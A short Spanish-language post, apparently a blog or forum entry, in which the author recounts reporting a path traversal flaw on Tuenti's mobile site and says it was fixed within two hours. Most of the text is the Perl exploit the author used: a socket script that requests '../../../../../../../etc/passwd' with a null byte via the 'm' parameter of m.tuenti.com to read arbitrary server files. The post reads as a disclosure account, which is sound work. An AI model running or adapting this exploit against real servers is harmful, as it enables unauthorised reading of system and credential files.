Bueno le pase el error a diminitrix y el contacto con el encargado de seguridad, tambien se lo envié chica de elpais tecnología y ella contacto con tuenti, a las dos horas de hacerlo ya lo arreglaron.
El fallo era un path traversal que te permitía poder leer cualquier fichero del sistema(que tenga permisos claro).
Este era el exploit que utlizaba:
#!/usr/bin/perl
use IO::Socket::INET;
$host = "m.tuenti.com";
$attack = "../../../../../../../etc/passwd";
my $sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
print $sock $request . "GET /?m=" . $attack ."%00 HTTP/1.1\r\n"
. "Host: " . $host ."\r\n"
. "Connection: Close\r\n\r\n";
while($line = <$sock>) { print $line; }